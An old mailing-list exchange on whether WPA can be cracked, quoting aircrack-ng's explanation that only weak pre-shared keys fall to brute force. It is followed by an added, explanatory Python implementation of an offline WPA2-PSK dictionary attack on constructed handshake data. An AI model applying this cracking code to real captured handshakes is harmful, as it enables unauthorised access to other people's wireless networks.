testing wireless security

Josh Paetzel josh at tcbug.org
Tue Nov 20 05:57:04 PST 2007

On Monday 19 November 2007 05:55:07 pm Mark D. Foster wrote:
> Josh Paetzel wrote:
> > When I looked into this it seemed that the current state of affairs is
> > that WPA can only be broken by brute-forcing the key.  I don't recall if
> > that could be done 'off-line' or not.  My memory is that the needed info
> > to attempt brute-forcing could be gathered by simply receiving... no
> > attempt to associate to the AP was needed.   I'm not really interested in
> > disseminating links to tools that can be used to break wireless security,
> > but simple google searches will give you the info you need.....and the
> > tools are in the ports tree for the most part.
> >
> > Fortunately WPA allows keys that put even resource-rich attackers into
> > the decade range to brute-force.
> That would not appear to be a limitation of aircrack-ng
> http://www.freshports.org/net-mgmt/aircrack-ng/
> aircrack is an 802.11 WEP and WPA-PSK keys cracking program that can
> recover these keys once enough encrypted packets have been captured.
> It implements the standard FMS attack along with some optimizations
> like KoreK attacks, thus making the attack much faster compared to
> other WEP cracking tools. In fact aircrack is a set of tools for
> auditing wireless networks.
> That said, I haven't (yet) tried it myself ;)

Well, if you were to read your own link for a bit you'd eventually find...


Quoting from the page....

WPA/WPA2 supports many types of authentication beyond pre-shared keys. 
aircrack-ng can ONLY crack pre-shared keys. So make sure airodump-ng shows 
the network as having the authentication type of PSK, otherwise, don't bother 
trying to crack it.

There is another important difference between cracking WPA/WPA2 and WEP. This 
is the approach used to crack the WPA/WPA2 pre-shared key. Unlike WEP, where 
statistical methods can be used to speed up the cracking process, only plain 
brute force techniques can be used against WPA/WPA2. That is because the key 
is not static, so collecting IVs, as when cracking WEP encryption, does not 
speed up the attack. The only thing that does give the information to start 
an attack is the handshake between client and AP. Handshaking is done when 
the client connects to the network. Although not absolutely true, for the 
purposes of this tutorial, consider it true. Since the pre-shared key can be 
from 8 to 63 characters in length, it effectively becomes impossible to crack 
the pre-shared key.

The only time you can crack the pre-shared key is if it is a dictionary word 
or relatively short in length. Conversely, if you want to have an unbreakable 
wireless network at home, use WPA/WPA2 and a 63 character password composed 
of random characters including special symbols.


Josh Paetzel

PGP: 8A48 EF36 5E9F 4EDA 5A8C 11B4 26F9 01F1 27AF AECB
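To make the quoted aircrack-ng paragraphs concrete, the following is an added example written for this page; it is not code from the thread, from aircrack-ng or from FreeBSD. It shows why a single captured 4-way handshake is enough for an offline attack (the client's EAPOL message 2 carries a MIC keyed from the passphrase, so every guess can be checked without touching the AP), why each guess is expensive (the passphrase-to-PMK mapping is PBKDF2-HMAC-SHA1 with 4096 iterations), and why a 63-character random passphrase is out of reach. The SSID, MAC addresses, nonces, passphrases and wordlist are constructed test data; the key derivation follows the 802.11i standard (descriptor version 2, HMAC-SHA1 MIC) and the "capture" is simulated by computing the MIC with the real passphrase.

```python
"""WPA2-PSK offline check against a captured 4-way handshake (constructed example)."""
import hashlib
import hmac
import math

PBKDF2_ITERATIONS = 4096                 # fixed by the 802.11i passphrase-to-PSK mapping
PRF_LABEL = b"Pairwise key expansion"    # 802.11i PRF label for PTK derivation
MIC_OFFSET = 81                          # 4-byte EAPOL header + 77 bytes to the Key MIC field

# Constructed sample data: not from any real network.
SSID = "ExampleNet"
AA = bytes.fromhex("00112233aabb")       # AP MAC (authenticator address)
SPA = bytes.fromhex("66778899ccdd")      # client MAC (supplicant address)
ANONCE = bytes(range(32))                # nonce from message 1
SNONCE = bytes(range(32, 64))            # nonce from message 2
WORDLIST = ["letmein", "sunshine", "password123", "dragon12"]   # toy dictionary


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PSK/PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    The 4096 rounds are paid per candidate, which is what makes each guess slow."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(),
                               PBKDF2_ITERATIONS, 32)


def ptk_from_pmk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-512(PMK, label, min(AA,SPA)||max(AA,SPA)||min(AN,SN)||max(AN,SN))."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, PRF_LABEL + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return out[:64]            # KCK is the first 16 bytes; KEK/TK are not needed here


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Key MIC (descriptor version 2): HMAC-SHA1 over the frame with the MIC zeroed, 16 bytes."""
    zeroed = frame[:MIC_OFFSET] + b"\x00" * 16 + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def build_msg2(snonce: bytes, mic: bytes = b"\x00" * 16) -> bytes:
    """Minimal EAPOL-Key message 2 (client -> AP); key data field left empty."""
    body = (b"\x02"                     # descriptor type: RSN
            + b"\x01\x0a"               # key info: version 2, pairwise, MIC present
            + b"\x00\x10"               # key length
            + b"\x00" * 7 + b"\x01"     # replay counter = 1
            + snonce
            + b"\x00" * 16              # key IV
            + b"\x00" * 8               # key RSC
            + b"\x00" * 8               # key ID (reserved)
            + mic
            + b"\x00\x00")              # key data length = 0
    return b"\x02\x03" + len(body).to_bytes(2, "big") + body


def construct_handshake(passphrase, ssid, aa, spa, anonce, snonce) -> bytes:
    """Stands in for the sniffed message 2: the real client signs it with the real passphrase."""
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), aa, spa, anonce, snonce)[:16]
    return build_msg2(snonce, eapol_mic(kck, build_msg2(snonce)))


def candidate_matches(candidate, ssid, aa, spa, anonce, snonce, msg2) -> bool:
    """Offline test of one guess: derive PMK -> PTK -> KCK and recompute the MIC."""
    kck = ptk_from_pmk(pmk_from_passphrase(candidate, ssid), aa, spa, anonce, snonce)[:16]
    return hmac.compare_digest(eapol_mic(kck, msg2), msg2[MIC_OFFSET:MIC_OFFSET + 16])


def crack_psk(wordlist, ssid, aa, spa, anonce, snonce, msg2):
    """Dictionary attack; passphrases outside the 8..63 character range cannot be valid PSKs."""
    for word in wordlist:
        if 8 <= len(word) <= 63 and candidate_matches(word, ssid, aa, spa, anonce, snonce, msg2):
            return word
    return None


def years_to_exhaust(length: int, alphabet_size: int, guesses_per_second: float) -> float:
    """Brute-force bound in years; computed in log space so 95^63 does not overflow."""
    log10_seconds = length * math.log10(alphabet_size) - math.log10(guesses_per_second)
    return 10 ** (log10_seconds - math.log10(365 * 86400))


if __name__ == "__main__":
    weak = construct_handshake("password123", SSID, AA, SPA, ANONCE, SNONCE)
    print("weak PSK recovered:", crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, weak))
    strong = construct_handshake("Q" * 63, SSID, AA, SPA, ANONCE, SNONCE)
    print("63-char PSK recovered:", crack_psk(WORDLIST, SSID, AA, SPA, ANONCE, SNONCE, strong))
    print("years for 95^63 at 10^12 guesses/s: %.3g" % years_to_exhaust(63, 95, 1e12))
```

The per-guess cost is two PBKDF2 halves of 4096 HMAC-SHA1 rounds each, so a dictionary is the only practical input; nothing in the capture shortcuts that work, which is exactly the contrast with WEP's statistical IV attacks drawn in the quoted text. Only PSK networks are affected: with 802.1X/EAP the PMK comes from the authentication server rather than a passphrase, so there is nothing to guess.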